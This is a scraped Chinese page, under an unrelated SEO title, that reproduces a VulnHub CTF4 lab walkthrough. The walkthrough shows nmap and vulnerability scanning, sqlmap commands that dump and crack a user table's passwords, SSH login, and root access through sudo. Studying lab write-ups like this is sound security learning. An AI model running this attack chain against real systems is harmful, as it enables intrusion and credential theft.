当前位置: 首页 > news >正文

丽水哪里有做网站的公司4000-262-WordPress添加PHP代码

丽水哪里有做网站的公司4000-262-,WordPress添加PHP代码,吕梁做网站,网页编辑按哪个键#x1f36c; 博主介绍#x1f468;‍#x1f393; 博主介绍#xff1a;大家好#xff0c;我是 hacker-routing #xff0c;很高兴认识大家~ ✨主攻领域#xff1a;【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】 #x1f389;点赞➕评论➕收藏… 博主介绍‍ 博主介绍大家好我是 hacker-routing 很高兴认识大家~ ✨主攻领域【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】 点赞➕评论➕收藏 养成习惯一键三连 欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋 作者水平有限欢迎各位大佬指点相互学习进步 一、信息收集 1.主机探测 靶机IP地址是192.168.111.131 2.nmap扫描 端口开放了22、25、80、631端口 ┌──(rootkali)-[~/桌面] └─# nmap -sS -A 192.168.111.131nmap漏洞扫描 扫描出来这么多漏洞包括跨站请求伪造csrf、文件遍历、sql注入等 ┌──(rootkali)-[~/桌面] └─# nmap --scriptvuln -p22,25,80,631 192.168.111.131 使用 --scriptvuln 可以对目标主机或目标主机所在的网段应用弱口令检测 3.目录扫描 ┌──(rootkali)-[~/桌面] └─# dirsearch -u http://192.168.111.131二、漏洞利用 1.web渗透利用 端口开放22,25,80,631其中631关闭了22扫描没有有关的漏洞放在最后看25邮件服务80web端口从目前看是最先利用的端口了 80web端口 自己碰到这种页面可以尝试着自己多点击一下功能看看有什么突破没有 我这里在点击Blog模块然后再随机点击别的就出现了以下 的界面可能存在sql注入漏洞 在这里尝试输入不同的id值发现 输入5以后的数字就变成了一篇文章说明存在sql注入漏洞 我们现在再利用单引号去看看会不会发生报错去检测sql注入的注入点 发现报错了说明192.168.111.131/index.html?pageblogtitleBlogid5是注入点 2.sqlmap注入 sqlmap一把梭 ##数据库 sqlmap -u 192.168.111.131/index.html?pageblogtitleBlogid5 --dbs --batch##表 sqlmap -u 192.168.111.131/index.html?pageblogtitleBlogid5 -D ehks --tables --batch ##列 sqlmap -u 192.168.111.131/index.html?pageblogtitleBlogid5 -D ehks -T user --columns --batch ##字段 sqlmap -u 192.168.111.131/index.html?pageblogtitleBlogid5 -D ehks -T user -C user_id,user_name,user_pass --dump --batch 数据库ehks的表user中成功发现了几个用户名和密码并对密码的md5进行了自动破解 ---------------------------------------------------------------------- | user_id | user_name | user_pass | ---------------------------------------------------------------------- | 1 | dstevens | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf) | | 2 | achen | b46265f1e7faa3beab09db5c28739380 (seventysixers) | | 3 | pmoore | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite) | | 4 | jdurbin | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978) | | 5 | sorzek | 64d1f88b9b276aece4b0edcc25b7a434 (pacman) | | 6 | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1) | ---------------------------------------------------------------------- 3.ssh远程连接 一般发现账号密码然后又开启了22端口先尝试下利用ssh远程连接 但是这里发现是ssh的版本过低的原因 经过利用chatgpt的提示得到下面的命令行成功拿到了dstevens用户的权限 ssh -oKexAlgorithmsdiffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens192.168.111.131 三、提权 1.SUID提权 发现没有什么可以利用提权的命令 [dstevensctf4 mail]$ find / -user root -perm -4000 -print 2/dev/null 2.sudo提权 sudo -l发现直接可以是最高权限 直接sudo -i拿到root权限 3.flag 可以利用find查找下flag在哪 [rootctf4 ~]# find / -name *flag*
http://www.pierceye.com/news/115592/

相关文章:

  • 建设网站做什么赚钱网站制作.
  • 小企业公司网站怎么建做网站英文编辑有前途吗
  • 优化图片传网站wordpress背景图片
  • 网站服务器哪家好些外包做网站不付尾款
  • 建站系统wordpress下载哪个公司的微信商城系统
  • 网站建设app开发合同深圳企业网站制作设计方案
  • 免费网站整站模板下载寻找做网站
  • 做此广告的网站做家纺的网站
  • 湖南畅想网站建设个人网站建设基本定位
  • 建站公司外包钓鱼网站怎么做
  • 个人网站logo需要备案吗鑫灵锐做网站多少钱
  • .xyz做网站怎么样网站产品预算
  • 建网站先要申请网址吗做网站给文件不侵权
  • 一元夺宝网站建设Wordpress 普通图片裁剪
  • 网站推广都有哪些自己有网站怎么优化
  • 宠物交易网站模板更改wordpress后台登录地址
  • 有电脑网站怎样建手机正规网络游戏平台
  • 网站抓取QQ获取系统cms监控手机客户端
  • 郑州网站推广价格优礼品网站模板
  • 百度指数不高的网站怎么优化网站图片类型
  • 北京专业做网站怎么样app软件开发摄像头
  • 网站建设导向erp系统软件免费版
  • 手表网站网站开发毕业设计文献综述
  • 台州网站制作维护关于微网站策划ppt怎么做
  • 网站建设中期目标开发app找那个公司
  • 跨境自建站模板网站内容和功能清单
  • 平面设计找素材的网站电子商务网站建设的步骤一般为(
  • 一个服务器可以备案几个网站凡科门店通怎么样
  • 房地产企业网站建设想给公司产品做个推广
  • 国外网站平台wordpress电脑安装教程